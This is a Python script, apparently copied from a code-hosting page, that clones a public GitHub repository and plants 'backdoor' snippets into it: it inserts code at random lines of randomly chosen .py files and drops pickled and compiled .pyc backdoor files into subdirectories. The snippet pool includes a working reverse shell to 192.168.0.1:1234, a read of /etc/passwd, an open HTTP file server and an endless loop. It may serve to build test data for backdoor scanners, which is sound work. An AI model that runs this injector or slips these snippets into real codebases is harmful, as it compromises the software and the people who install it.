187 lines
		
	
	
		
			4.9 KiB
		
	
	
	
		
			Python
		
	
	
	
	
	
			
		
		
	
	
			187 lines
		
	
	
		
			4.9 KiB
		
	
	
	
		
			Python
		
	
	
	
	
	
| from typing import Tuple, List
 | |
| from git import Repo  # type: ignore
 | |
| import random
 | |
| from pathlib import Path
 | |
| import pickle
 | |
| import os
 | |
| import py_compile
 | |
| 
 | |
| 
 | |
def clone_repo(repo_url: str, clone_dir: str) -> None:
    """
    Make a shallow (depth 1) clone of a Git repository.

    Any exception raised while cloning is caught and reported on stdout,
    so the function returns normally whether or not the clone succeeded.

    Args:
        repo_url (str): The URL of the Git repository to clone.
        clone_dir (str): The directory the repository is cloned into.
    """
    try:
        # depth=1 fetches only the latest commit instead of the full history.
        Repo.clone_from(repo_url, clone_dir, depth=1)
    except Exception as error:
        message = f"Error cloning repository: {error}"
        print(message)
 | |
| 
 | |
| 
 | |
# Return type of the backdoor injection: each entry holds the injected file name and the line number.
 | |
| 
 | |
| 
 | |
def inject_random_backdoor(
    path: str, sample_rate: float = 0.1
) -> Tuple[Tuple[str, int], ...]:
    """
    Insert a randomly chosen backdoor snippet into a random sample of Python files.

    Every ``*.py`` file found recursively under ``path`` is selected
    independently with probability ``sample_rate``. Each selected file gets
    one entry of the module-level ``backdoors`` list inserted at a random
    line boundary and is then rewritten in place.

    Args:
        path (str): The path to the repository to insert the backdoor into.
        sample_rate (float): Probability that any given Python file is
            selected for injection.

    Returns:
        Tuple[Tuple[str, int], ...]: One ``(file path, insertion index)``
        pair per modified file. The index is the 0-based position in the
        file's original list of lines at which the snippet was inserted.
    """
    # Pick the files first so that no file is modified while the tree is
    # still being walked. Directories that merely end in ".py" are skipped.
    selected_files = [
        python_file
        for python_file in Path(path).rglob("*.py")
        if python_file.is_file() and random.random() < sample_rate
    ]

    results: List[Tuple[str, int]] = []
    for python_file in selected_files:
        # Undecodable bytes are dropped instead of aborting the whole run.
        with open(python_file, "r", encoding="utf-8", errors="ignore") as f:
            lines = f.readlines()

        # randint is inclusive on both ends, so the snippet may also be
        # appended after the last line.
        inject_line_number = random.randint(0, len(lines))
        inject_code = random.choice(backdoors)
        lines.insert(inject_line_number, inject_code + "\n")

        # Reopen in "w" mode so the file is truncated before writing; an
        # in-place overwrite could leave stale trailing bytes when dropped
        # undecodable bytes make the new content shorter than the old.
        with open(python_file, "w", encoding="utf-8") as f:
            f.writelines(lines)
        results.append((str(python_file), inject_line_number))

    return tuple(results)
 | |
| 
 | |
| 
 | |
# Example 1: run a command via os.system
backdoor1 = """
import os
os.system('ls')
"""

# Example 2: run a command via the subprocess module
backdoor2 = """
import subprocess
subprocess.call(['ls', '-l'])
"""

# Example 3: open a reverse shell
backdoor3 = """
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.1",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
"""

# Example 4: execute arbitrary code via eval
backdoor4 = """
code = "print('Hello, World!')"
eval(code)
"""

# Example 5: execute arbitrary code via exec
backdoor5 = """
code = '''
import os
os.system('ls')
'''
exec(code)
"""

# Example 6: simple HTTP server backdoor
backdoor6 = """
import http.server
import socketserver

PORT = 8000

Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("serving at port", PORT)
    httpd.serve_forever()
"""

# Example 7: read and print a file's contents
backdoor7 = """
with open('/etc/passwd', 'r') as file:
    data = file.read()
    print(data)
"""

# Example 8: infinite loop
backdoor8 = """
while True:
    print("This is a backdoor.")
"""

# Pool of sample snippets that the inject_* functions choose from.
backdoors = [
    backdoor1,
    backdoor2,
    backdoor3,
    backdoor4,
    backdoor5,
    backdoor6,
    backdoor7,
    backdoor8,
]
 | |
| 
 | |
| 
 | |
def inject_pickle_backdoor(root_path: str) -> None:
    """
    Write pickled backdoor snippets into random subdirectories of a repository.

    A random, non-empty subset of the immediate subdirectories of
    ``root_path`` is chosen. In each chosen directory one randomly selected
    entry of the module-level ``backdoors`` list is pickled to
    ``backdoor<index>.pickle``. Nothing is written when ``root_path`` has no
    subdirectories.

    Args:
        root_path (str): The path to the repository to insert the backdoor into.
    """
    all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()]
    if not all_path:
        # Nothing to inject into; random.sample would have nothing to pick.
        return

    # randint is inclusive, so between one and all directories are chosen.
    # (randrange(1, n) raised ValueError for n <= 1 and never picked all n.)
    paths = random.sample(all_path, random.randint(1, len(all_path)))
    for path in paths:
        backdoor_id = random.randrange(len(backdoors))
        filename = os.path.join(path, f"backdoor{backdoor_id}.pickle")
        with open(filename, "wb") as f:
            pickle.dump(backdoors[backdoor_id], f)
 | |
| 
 | |
| 
 | |
def inject_pyc_backdoor(root_path: str) -> None:
    """
    Write compiled (.pyc) backdoor snippets into random subdirectories of a repository.

    A random, non-empty subset of the immediate subdirectories of
    ``root_path`` is chosen. In each chosen directory one randomly selected
    entry of the module-level ``backdoors`` list is written to a temporary
    ``backdoor<index>.py``, compiled to ``backdoor<index>.pyc`` next to it,
    and the temporary source file is removed. Nothing is written when
    ``root_path`` has no subdirectories.

    Args:
        root_path (str): The path to the repository to insert the backdoor into.
    """
    all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()]
    if not all_path:
        # Nothing to inject into; random.sample would have nothing to pick.
        return

    # randint is inclusive, so between one and all directories are chosen.
    # (randrange(1, n) raised ValueError for n <= 1 and never picked all n.)
    paths = random.sample(all_path, random.randint(1, len(all_path)))

    for path in paths:
        backdoor_id = random.randrange(len(backdoors))
        py_filename = os.path.join(path, f"backdoor{backdoor_id}.py")
        pyc_filename = os.path.join(path, f"backdoor{backdoor_id}.pyc")
        with open(py_filename, "w", encoding="utf-8") as f:
            f.write(backdoors[backdoor_id])

        try:
            py_compile.compile(py_filename, cfile=pyc_filename)
        finally:
            # Always drop the temporary source, even if compilation raised.
            os.remove(py_filename)
 | |
| 
 | |
| 
 | |
if __name__ == "__main__":
    # Demo run: shallow-clone a public repository into a scratch directory,
    # then seed it with source-level and pickle-file backdoor samples.
    target_dir = "/tmp/repo"
    clone_repo("https://github.com/TheAlgorithms/Python.git", target_dir)
    inject_random_backdoor(target_dir)
    inject_pickle_backdoor(target_dir)
 |